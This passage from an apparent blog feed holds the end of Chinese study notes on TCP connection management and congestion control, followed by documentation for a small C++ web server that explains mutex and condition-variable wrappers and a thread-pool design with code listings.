新值的新报文段，这样就会使得<strong>主机A无法知道主机B的接收缓存已经有新的空间了</strong>。因此<strong>主机A将会被阻塞，而无法再发送数据</strong>。</p><p>对于这个问题，TCP规范中要求：<strong>当主机B的接收窗口为0时，主机A继续发送只有一个字节数据的报文段，这些报文段将会被接收方确认。</strong>等到最终主机B的缓存清空，返回的确认报文中将包含一个非零的 rwnd 值。</p></li></ul><h4 id="f-TCP-连接管理">f. TCP 连接管理</h4><ul><li><p>TCP连接流程</p><ul><li><p>客户端TCP首先向服务器端的TCP发送一个特殊TCP报文段。该报文段中不包含应用层数据，而是在报文段首部设置 <strong>SYN 比特为1</strong>。
该特殊报文段被称为 <strong>SYN 报文段</strong>。</p><p>同时，客户端会<strong>随机选择</strong>一个<strong>初始序号 client_isn</strong>，并将此编号放置进该起始的TCP SYN 报文段的<strong>序号字段</strong>中。</p><blockquote><p>注意：适当的随机选择 client_isn 在避免某些安全性攻击方面起到了一定的作用。</p></blockquote></li><li><p>当 TCP SYN 报文段到达服务器主机，则服务器会为该TCP连接<strong>分配 TCP 缓存和变量</strong>，并向该客户TCP发送允许连接的报文段。</p><blockquote><p>注意：提前分配缓存和变量可能受到 SYN 洪泛攻击。</p></blockquote><p>该报文段也不包含应用层数据，而是设置</p><ul><li><strong>SYN 比特为1</strong></li><li>TCP报文首部的<strong>确认号</strong>为 client_isn + 1</li><li>TCP报文首部的<strong>序号字段</strong>为 服务器的初始序号 server_isn 。</li></ul><p>该允许连接的报文段被称为 <strong>SYNACK报文段</strong>。</p></li><li><p>当客户端收到 SYNACK 报文段时，客户端也为该连接分配缓存和变量。之后客户端向服务器发送最后一个报文段，<strong>对服务器的允许连接报文进行确认</strong>（客户端将值server_isn + 1放置进TCP报文段首部的确认字段）。由于连接已经建立，因此<strong>SYN比特置0</strong>。</p><p>在这个确认报文中，<strong>可以带上客户端到服务器的数据</strong>。</p></li></ul><p>为了创建连接，TCP会在两台主机之间发送3个分组，因此这个连接过程通常称为<strong>三次握手</strong>。</p><p><img src="/2021/05/cnatda-1/image-20210515092421032.png" alt="image-20210515092421032"></p></li><li><p>TCP连接拆除</p><p>参与一条TCP连接的两个进程中的任何一个都能终止该连接。</p><p><img src="/2021/05/cnatda-1/image-20210515092825158.png" alt="image-20210515092825158"></p></li></ul><h4 id="g-拥塞控制原理">g. 拥塞控制原理</h4><ul><li><p>拥塞原因与代价</p><ul><li><p>假设主机A、B经由一条容量为R的共享式输出链路发送数据。当每台主机的发送速率接近 R/2 时，平均时延将会越来越大。当发送速率超过 R/2 时，路由器中的平均排队分组数就会无限增长，源与目的地之间的平均时延也会变成无穷大。</p></li><li><p>发送方必须执行重传以补偿因为缓存溢出而丢弃的分组。</p></li><li><p>发送方在遇到大的时延时所进行的<strong>不必要重传</strong>会引起路由器利用其链路带宽来<strong>转发不必要的分组副本</strong>。</p></li><li><p>当一个分组沿着一条路径被丢弃时，每个上游路由器为<strong>转发该分组（直至它被丢弃）</strong>而使用的传输容量最终都被浪费掉了。</p></li></ul></li><li><p>拥塞控制方法</p><ul><li>端到端拥塞控制：由于网络层<strong>没有</strong>为运输层提供<strong>显式支持</strong>，因此即便网络中存在拥塞，端系统也必须通过对网络行为的观察来推断。例如通过超时或冗余ACK来判断。</li><li>网络辅助的拥塞控制：在网络辅助的拥塞控制中，路由器向发送方提供关于网络中拥塞状态的显式反馈信息。这类拥塞信息从网络反馈到发送方通常有两种方式：<ul><li>直接反馈信息：由网络路由器发给发送方。这种方式通常采用一种阻塞分组的形式。</li><li>更通用的第二种形式：路由器标记或更新从发送方流向接收方的分组中的某个字段来表示拥塞的产生。当收到一个标记的分组后，接收方就会向发送方通知该网络拥塞指示。</li></ul></li></ul></li></ul><h4 id="h-TCP-拥塞控制">h. 
TCP 拥塞控制</h4><ul><li><p>TCP采用的方式是让每一个发送方<strong>根据所感知到的网络拥塞程度</strong>来限制其能向连接发送流量的速率。</p><p>运行在发送方的 TCP 拥塞控制机制跟踪一个额外的变量：<strong>拥塞窗口cwnd</strong>。它限制了一个TCP发送方能向网络中发送流量的速率。即 $LastByteSent - LastByteAcked \le \min\{cwnd, rwnd\}$。发送速率大约为 $\min\{cwnd, rwnd\} / RTT$ 字节/秒。</p></li><li><p>TCP发送方怎样确定它应当发送的速率?</p><ul><li>一个丢失的报文段意味着拥塞。因此当丢失报文段时应当降低TCP发送方的速率。</li><li>一个确认报文段表示该网络正在向接收方交付发送方的报文段，因此当对先前未确认报文段的确认到达时，能够增加发送方的速率。</li><li>带宽探测。</li></ul></li><li><p>TCP拥塞控制算法</p><ul><li><p><strong>慢启动</strong></p><ul><li><p>慢启动起始阶段</p><p>在慢启动状态，cwnd的值以1个MSS开始并且每当传输的报文段首次被确认就增加1个MSS。这会使得每过一个RTT，发送速率就翻倍。</p><p>TCP发送速率起始慢，但在慢启动阶段以指数增长。</p></li><li><p>慢启动结束阶段</p><p>如果存在一个由<strong>超时指示</strong>的丢包事件（注意，不包括由冗余ACK指示的丢包），TCP发送方将第二个状态变量 <strong>ssthresh（慢启动阈值）</strong>设置为丢包发生时 cwnd 值的一半，然后将cwnd设置为1个MSS并重新开始慢启动过程。</p><p>当cwnd的值等于 ssthresh 时，结束慢启动并且TCP转移到<strong>拥塞避免模式</strong>。此时TCP会更为谨慎地增加 cwnd。</p><p>如果检测到3个冗余ACK，则TCP执行快速重传并进入<strong>快速恢复</strong>状态。</p></li></ul></li><li><p><strong>拥塞避免</strong></p><p>一旦进入拥塞避免状态，cwnd的值大约是上次遇到拥塞时的值的一半，此时采用一种较保守的方法：<strong>每个RTT</strong>只将cwnd的值增加一个MSS。</p><blockquote><p>注意区分开，慢启动初始时是<strong>每个报文段被确认</strong>则增加一个MSS。而这里是<strong>每个RTT</strong>增加一个MSS。</p></blockquote><p>对于冗余ACK指示的丢包事件来说，当收到3个冗余ACK时，TCP将ssthresh的值记录为cwnd的值的一半，并将cwnd减半。</p></li><li><p><strong>快速恢复</strong></p><ul><li>在快速恢复中，对于引起TCP进入快速恢复状态的缺失报文段，对收到的每个冗余ACK，cwnd的值增加一个MSS。最终当对丢失报文段的一个ACK到达时，TCP在降低cwnd后进入拥塞避免状态。</li><li>如果出现超时事件，快速恢复在执行如同在慢启动和拥塞避免中相同的动作后，迁移到慢启动状态：当丢包事件出现时，ssthresh的值被设置为当时 cwnd 值的一半，并且cwnd的值被设置为1个MSS。</li></ul></li></ul><p><img src="/2021/05/cnatda-1/image-20210515131916271.png" alt="image-20210515131916271"></p></li><li><p>公平性</p><p>TCP趋于在多条连接之间平等共享带宽，但UDP因为没有拥塞控制机制，因此UDP源有可能压制TCP流量。</p></li><li><p>明确拥塞通告：网络辅助拥塞控制</p><ul><li>对于IP和TCP的扩展方案 RFC3168 允许网络明确向TCP发送方和接收方发出拥塞信号。这种形式的网络辅助拥塞控制称为<strong>明确拥塞通告（Explicit Congestion Notification, 
ECN）</strong>，涉及到TCP和IP协议。</li><li>在网络层，<strong>IP数据报</strong>首部的服务类型字段中的<strong>两个比特</strong>被用于ECN。路由器所使用的一种ECN比特设置表示该路由器<strong>正在经历拥塞</strong>。该拥塞指示则由被标记的IP数据报所携带，送给<strong>目的主机</strong>，再由<strong>目的主机</strong>通知<strong>发送主机</strong>。</li><li>RFC3168 推荐仅当拥塞持续不断存在时才设置 ECN比特。发送主机所使用的另一种ECN比特设置通知路由器发送方和接收方是ECN使能的，因此能够对ECN指示的网络拥塞采取行动。</li><li>除了TCP以外的其他运输层协议也可以利用网络层发送ECN信号。</li></ul></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;简介&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;这里记录了笔者阅读《计算机网络：自顶向下方法》的一些笔记。笔记有所缩略。&lt;/li&gt;
&lt;li&gt;主要关于
&lt;ul&gt;
&lt;li&gt;第一章：计算机网络和因特网&lt;/li&gt;
&lt;li&gt;第二章：应用层&lt;/li&gt;
&lt;li&gt;第三章：运输层&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    
    <category term="计算机网络" scheme="https://kiprey.github.io/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/"/>
    
  </entry>
  
  <entry>
    <title>WebServer v1.0 文档</title>
    <link href="https://kiprey.github.io/2021/05/WebServer-1/"/>
    <id>https://kiprey.github.io/2021/05/WebServer-1/</id>
    <published>2021-05-11T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.798Z</updated>
    
    <content type="html"><![CDATA[<h2 id="概述">概述</h2><p>WebServer 1.0 简单实现了一个基础的 <strong>多并发网络服务程序</strong> 。在该版本中，主要实现了以下重要内容：</p><ul><li>线程互斥锁 &amp; 条件变量的封装</li><li>线程池的设计，以支持并发</li><li>基础网络连接的实现</li><li>http 协议的简略支持<ul><li>支持部分常用 HTTP 报文<ul><li>200 OK</li><li>400 Bad Request</li><li>500 Internal Server Error</li><li>501 Not Implemented</li><li>505 HTTP Version Not Supported</li></ul></li><li>支持 HTTP GET 请求</li><li>支持 HTTP/1.1 <strong>持续连接</strong> 特性</li></ul></li></ul><p>1.0 版本的项目代码位于 <a href="https://github.com/Kiprey/WebServer/tree/4095ccc6fd3facd3988ea71178cacad7b4e0dd13">Kiprey/WebServer CommitID: 4095cc - github</a></p><p>最新版本的项目代码位于 <a href="https://github.com/Kiprey/WebServer">Kiprey/WebServer - github</a></p><span id="more"></span><p>运行示例：</p><p><img src="/2021/05/WebServer-1/image-20210512133857068.png" alt="image-20210512133857068"></p><blockquote><p>注意：该程序的实现大量参考了 <a href="https://github.com/linyacool/WebServer">linyacool/WebServer - github</a> 的代码。</p></blockquote><h2 id="一、互斥锁-条件变量">一、互斥锁 &amp; 条件变量</h2><h3 id="1-互斥锁">1. 
互斥锁</h3><p>对于当前的多线程程序来说，可能会出现多个线程同时读写同一个数据结构的情况，那么此时势必会造成脏读这种错误情况。而互斥锁的使用，是为了保证数据共享操作的完整性，确保任一时刻，只能有一个线程访问目标对象。</p><p>在linux中，互斥锁主要使用以下函数来实现：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 初始化 mutex 对象</span></span><br><span class="line"><span class="type">pthread_mutex_t</span> mutex = PTHREAD_MUTEX_INITIALIZER;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">pthread_mutex_init</span><span class="params">(<span class="type">pthread_mutex_t</span> *restrict mutex,</span></span></span><br><span class="line"><span class="params"><span class="function">                        <span class="type">const</span> <span class="type">pthread_mutexattr_t</span> *restrict attr)</span></span>;</span><br><span class="line"><span class="comment">// mutex 加锁，在获得锁之前将会阻塞</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">pthread_mutex_lock</span><span class="params">(<span class="type">pthread_mutex_t</span> *mutex)</span></span>;</span><br><span class="line"><span class="comment">// mutex 加锁，如果能马上获取锁则返回0，无法获取锁则马上返回errno</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">pthread_mutex_trylock</span><span class="params">(<span class="type">pthread_mutex_t</span> *mutex)</span></span>;</span><br><span class="line"><span class="comment">// mutex 释放锁</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span 
class="title">pthread_mutex_unlock</span><span class="params">(<span class="type">pthread_mutex_t</span> *mutex)</span></span>;</span><br><span class="line"><span class="comment">// 销毁 mutex 对象</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">pthread_mutex_destroy</span><span class="params">(<span class="type">pthread_mutex_t</span> *mutex)</span></span>;</span><br></pre></td></tr></table></figure><p>由于 pthread 族的库函数名称较长，并且调用方式也互不相同，因此在这些库函数上做了一个简单的封装：</p><blockquote><p>注意，这实际上就是<strong>RAII（资源获取即初始化）</strong>，是C++等编程语言常用的管理资源、避免内存泄露的方法。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * @brief MutexLock 将 pthread_mutex 封装成一个类, </span></span><br><span class="line"><span class="comment"> *        这样做的好处是不用记住那些繁杂的 pthread 开头的函数使用方式</span></span><br><span class="line"><span class="comment"> */</span> </span><br><span class="line"><span class="keyword">class</span> <span class="title class_">MutexLock</span></span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">private</span>:</span><br><span class="line">    <span class="type">pthread_mutex_t</span> mutex_;</span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line">    <span class="built_in">MutexLock</span>()     &#123; <span 
class="built_in">pthread_mutex_init</span>(&amp;mutex_, <span class="literal">nullptr</span>); &#125;</span><br><span class="line">    ~<span class="built_in">MutexLock</span>()    &#123; <span class="built_in">pthread_mutex_destroy</span>(&amp;mutex_); &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">lock</span><span class="params">()</span>     </span>&#123; <span class="built_in">pthread_mutex_lock</span>(&amp;mutex_); &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">unlock</span><span class="params">()</span>   </span>&#123; <span class="built_in">pthread_mutex_unlock</span>(&amp;mutex_); &#125;</span><br><span class="line">    <span class="function"><span class="type">pthread_mutex_t</span>* <span class="title">getMutex</span><span class="params">()</span> </span>&#123; <span class="keyword">return</span> &amp;mutex_; &#125;;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>正常来说，我们使用锁时，需要经过以下过程：<strong>获取锁-&gt;进入临界区-&gt;释放锁</strong>。但在实际使用锁时，容易忘记释放锁，而这是一个非常严重的错误。因此我们可以实现一个 <code>MutexLockGuard</code>类，借助类的构造函数和析构函数，来帮助我们自动获取锁和释放锁，只需一个简单的声明即可<strong>获取锁&amp;释放锁</strong>。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span 
class="comment">/**</span></span><br><span class="line"><span class="comment"> * @brief MutexLockGuard 主要是为了自动获取锁/释放锁, 防止意外情况下忘记释放锁</span></span><br><span class="line"><span class="comment"> *        而且块状的锁定区域更容易让人理解代码</span></span><br><span class="line"><span class="comment"> */</span> </span><br><span class="line"><span class="keyword">class</span> <span class="title class_">MutexLockGuard</span></span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">private</span>:</span><br><span class="line">    MutexLock&amp; lock_;</span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief 声明 MutexLockGuard 时自动上锁</span></span><br><span class="line"><span class="comment">     * @param lock 待锁定的资源</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="built_in">MutexLockGuard</span>(MutexLock&amp; mutex) : <span class="built_in">lock_</span>(mutex) &#123; lock_.<span class="built_in">lock</span>(); &#125;</span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * @brief 当前作用域结束时自动释放锁, 防止遗忘</span></span><br><span class="line"><span class="comment">     */</span> </span><br><span class="line">    ~<span class="built_in">MutexLockGuard</span>() &#123; lock_.<span class="built_in">unlock</span>(); &#125;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><h3 id="2-条件变量">2. 
条件变量</h3><p>一说起条件变量，就不得不先说起<strong>管程</strong>。管程保证了<strong>同一时刻只有一个线程在管程内活动</strong>，但<strong>不能保证</strong>线程在进入管程后，能继续一次性执行下去直到管程结束。</p><blockquote><p>例如某个线程好不容易进入了管程，但执行了一段时间，突然发现某个条件没有满足，使得当前线程必须阻塞，无法继续执行。但要是该线程原地阻塞，一直占用这个管程，那其他的线程自然就无法进入管程，造成死锁。</p></blockquote><p>那该怎么办呢？这就轮到条件变量出场了。</p><p>继续以上面的这个例子为例，由于该线程进入管程后可能会阻塞，因此非常肯定的是，必须在该线程进入阻塞状态前释放管程，否则会造成死锁。但是该线程已经进入管程，且没办法继续执行下去，因此只能<strong>原地释放管程</strong>，等到<strong>条件</strong>满足后被唤醒，并在<strong>重新获取管程锁</strong>之后继续执行。</p><p>条件变量起到的作用，就相当于控制线程在管程中挂起和唤醒的作用。上面的语句可能有点难以理解，请思考一下这个例子：</p><blockquote><p>线程池中，当子线程需要读取事件队列来获取事件之前，需要先获取队列的锁。当子线程获取到锁以后，如果队列为空，则条件不满足（注意这里的条件是：<strong>队列非空</strong>），因此子线程就无法从中获取事件，没法继续执行。此时可以使用条件变量让子线程在管程中挂起，等到条件满足时再通过条件变量来唤醒，回到管程继续执行。</p><p>注意：使用条件变量时，一定要确保<strong>在已经获取到管程锁的前提下</strong>使用，否则条件变量容易被多个子线程修改/使用。</p></blockquote><p>条件变量相关的函数如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 初始化条件变量</span></span><br><span class="line"><span class="type">pthread_cond_t</span> cond = PTHREAD_COND_INITIALIZER;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">pthread_cond_init</span><span class="params">(<span class="type">pthread_cond_t</span> *restrict cond,</span></span></span><br><span class="line"><span class="params"><span class="function">                      <span class="type">const</span> <span 
class="type">pthread_condattr_t</span> *restrict attr)</span></span>;</span><br><span class="line"><span class="comment">// 唤醒 **至少一个** 被目标条件变量阻塞的线程</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">pthread_cond_signal</span><span class="params">(<span class="type">pthread_cond_t</span> *cond)</span></span>;</span><br><span class="line"><span class="comment">// 唤醒 **所有** 被目标条件变量阻塞的线程</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">pthread_cond_broadcast</span><span class="params">(<span class="type">pthread_cond_t</span> *cond)</span></span>;</span><br><span class="line"><span class="comment">// 让目标条件变量阻塞当前线程</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">pthread_cond_wait</span><span class="params">(<span class="type">pthread_cond_t</span> *restrict cond,</span></span></span><br><span class="line"><span class="params"><span class="function">                      <span class="type">pthread_mutex_t</span> *restrict mutex)</span></span>;</span><br><span class="line"><span class="comment">// 让目标条件变量阻塞当前线程，并设置最大阻塞时间</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">pthread_cond_timedwait</span><span class="params">(<span class="type">pthread_cond_t</span> *restrict cond,</span></span></span><br><span class="line"><span class="params"><span class="function">                            <span class="type">pthread_mutex_t</span> *restrict mutex,</span></span></span><br><span class="line"><span class="params"><span class="function">                            <span class="type">const</span> <span class="keyword">struct</span> timespec *restrict abstime)</span></span>;</span><br><span class="line"><span class="comment">// 销毁条件变量</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span 
class="title">pthread_cond_destroy</span><span class="params">(<span class="type">pthread_cond_t</span> *cond)</span></span>;</span><br></pre></td></tr></table></figure><p>与上面的互斥锁一样，这里也实现了一个 <code>Condition</code>类来简化条件变量的使用：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * @brief 条件变量,主要用于多线程中的锁 </span></span><br><span class="line"><span class="comment"> *        与 MutexLock 一致,无需记住繁杂的函数名称</span></span><br><span class="line"><span class="comment"> *        条件变量主要是与mutex进行搭配,常用于资源分配相关的场景,</span></span><br><span class="line"><span class="comment"> *        例如当某个线程获取到锁以后,发现没有资源,则此时可以释放资源并等待条件变量</span></span><br><span class="line"><span class="comment"> * @note  注意: 使用条件变量时,必须上锁,防止出现多个线程共同使用条件变量</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span 
class="keyword">class</span> <span class="title class_">Condition</span></span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">private</span>:</span><br><span class="line">    MutexLock&amp; lock_;       <span class="comment">// 目标 Mutex 互斥锁</span></span><br><span class="line">    <span class="type">pthread_cond_t</span> cond_;   <span class="comment">// 条件变量</span></span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line">    <span class="built_in">Condition</span>(MutexLock&amp; mutex) : <span class="built_in">lock_</span>(mutex) &#123; <span class="built_in">pthread_cond_init</span>(&amp;cond_, <span class="literal">nullptr</span>); &#125;</span><br><span class="line">    ~<span class="built_in">Condition</span>()        &#123; <span class="built_in">pthread_cond_destroy</span>(&amp;cond_); &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">notify</span><span class="params">()</span>       </span>&#123; <span class="built_in">pthread_cond_signal</span>(&amp;cond_); &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">notifyAll</span><span class="params">()</span>    </span>&#123; <span class="built_in">pthread_cond_broadcast</span>(&amp;cond_); &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">wait</span><span class="params">()</span>         </span>&#123; <span class="built_in">pthread_cond_wait</span>(&amp;cond_, lock_.<span class="built_in">getMutex</span>()); &#125;</span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     *  @brief  等待当前的条件变量一段时间</span></span><br><span class="line"><span class="comment">     *  @param  sec 等待的时间(单位:秒)</span></span><br><span class="line"><span class="comment">     *  @return 成功在时间内等待到则返回 true, 超时则返回 
false</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="function"><span class="type">bool</span> <span class="title">waitForSeconds</span><span class="params">(<span class="type">size_t</span> sec)</span>   </span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        timespec abstime;</span><br><span class="line">        <span class="comment">// Get the current wall-clock time (pthread_cond_timedwait takes an absolute deadline)</span></span><br><span class="line">        <span class="built_in">clock_gettime</span>(CLOCK_REALTIME, &amp;abstime);</span><br><span class="line">        abstime.tv_sec += (<span class="type">time_t</span>)sec;</span><br><span class="line">        <span class="keyword">return</span> ETIMEDOUT != <span class="built_in">pthread_cond_timedwait</span>(&amp;cond_, lock_.<span class="built_in">getMutex</span>(), &amp;abstime);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><h2 id="二、线程池">II. Thread Pool</h2><h3 id="1-概述">1. Overview</h3><ul><li><p>A thread pool is a way of organizing multithreaded work that is common in high-concurrency servers. It lets such a server make efficient use of its threads.</p></li><li><p>Threads handle individual requests, and the usual flow is roughly: <strong>create thread =&gt; pass data to the child thread =&gt; detach thread =&gt; run thread =&gt; destroy thread</strong>. For small-scale communication this flow is good enough. On a high-concurrency server, however, the cost of repeatedly creating and destroying threads is not negligible, so a thread pool is used to reuse threads.</p></li></ul><h3 id="2-实现前的准备工作">2. 
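Preparation Before Implementation</h3><ul><li><p>For the task a thread is going to run, a few points need to be settled first:</p><ul><li>The function run by a worker thread should ideally have little to do with the main thread, i.e. coupling should be kept as low as possible.</li></ul></li><li><p>A task may take one argument, but it <strong>must not return a value</strong>.</p><blockquote><p>Supporting return values should be possible too, but that is left for later.</p></blockquote><p>With that in mind, the task struct can be designed as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// The basic unit of work handed to a worker thread</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ThreadpoolTask</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="built_in">void</span> (*function)(<span class="type">void</span>*);</span><br><span class="line">    <span class="type">void</span>* arguments;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p>Besides its own bookkeeping (thread count, task queue, and so on), the thread pool also needs a <strong>mutex</strong> and a <strong>condition variable</strong>.</p><ul><li>Worker threads may access the thread pool at the same time, so each of them has to <strong>take the lock</strong> before touching it.</li><li>After taking the lock, a thread may find that it <strong>holds the lock but has no task to run</strong>. In that case the worker has to release the lock and wait for a task to arrive, then re-acquire the lock and fetch the task once one does. This is exactly what the <strong>condition variable</strong> is for.</li></ul></li></ul><h3 id="3-子线程的目标函数">3. 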
The Worker Thread Entry Function</h3><p>Worker threads are only <strong>created when the pool is created</strong> and <strong>destroyed when the pool is destroyed</strong>, so each worker has to run an event loop that repeatedly <strong>fetches a task and executes it</strong>.</p><p>Two things need attention here:</p><ol><li>Fetching a task requires locking the pool because the task queue is accessed; when the queue is empty, the worker also has to wait on the condition variable, which temporarily releases the lock.</li><li>When the pool is destroyed, how should the workers terminate?</li></ol><p>There are two ways to handle the second point:</p><ol><li>Set a flag in the pool and have the workers poll it periodically to decide whether to exit.</li><li>The approach implemented here: push an <strong>exit task</strong> onto the task queue, and a worker exits when it executes that task.</li></ol><p>The implementation is shown below:</p><blockquote><p>Note that <code>pthread_cond_signal</code> wakes <strong>at least</strong> one waiting thread, and at least really means <strong>at least</strong>. Several threads may therefore be woken while only one task is pending. To handle this, a worker simply re-checks in a loop, after being woken, whether a task is actually available.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span>* <span class="title">ThreadPool::TaskForWorkerThreads_</span><span class="params">(<span class="type">void</span>* 
arg)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    ThreadPool* pool = (ThreadPool*)arg;</span><br><span class="line">    <span class="comment">// The worker thread starts here</span></span><br><span class="line">    ThreadpoolTask task;</span><br><span class="line">    <span class="comment">// Event loop of the worker thread</span></span><br><span class="line">    <span class="keyword">for</span>(;;)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// First fetch a task</span></span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// The lock must be held while fetching a task</span></span><br><span class="line">            <span class="function">MutexLockGuard <span class="title">guard</span><span class="params">(pool-&gt;threadpool_mutex_)</span></span>;</span><br><span class="line"></span><br><span class="line">            <span class="comment">/** </span></span><br><span class="line"><span class="comment">             * If the lock was acquired but there is no task to run,</span></span><br><span class="line"><span class="comment">             * go to sleep, release the lock and wait to be woken</span></span><br><span class="line"><span class="comment">             * <span class="doctag">NOTE:</span> pthread_cond_signal wakes at least one thread,</span></span><br><span class="line"><span class="comment">             *       so a woken thread may still find no task to process;</span></span><br><span class="line"><span class="comment">             *       in that case simply wait again in a loop.</span></span><br><span class="line"><span class="comment">             */</span> </span><br><span class="line">            <span class="keyword">while</span>(pool-&gt;task_queue_.<span class="built_in">size</span>() == <span class="number">0</span>)</span><br><span class="line">                pool-&gt;threadpool_cond_.<span class="built_in">wait</span>();</span><br><span class="line">            <span class="comment">// Once the loop exits, a task is guaranteed to be available</span></span><br><span class="line">            <span 
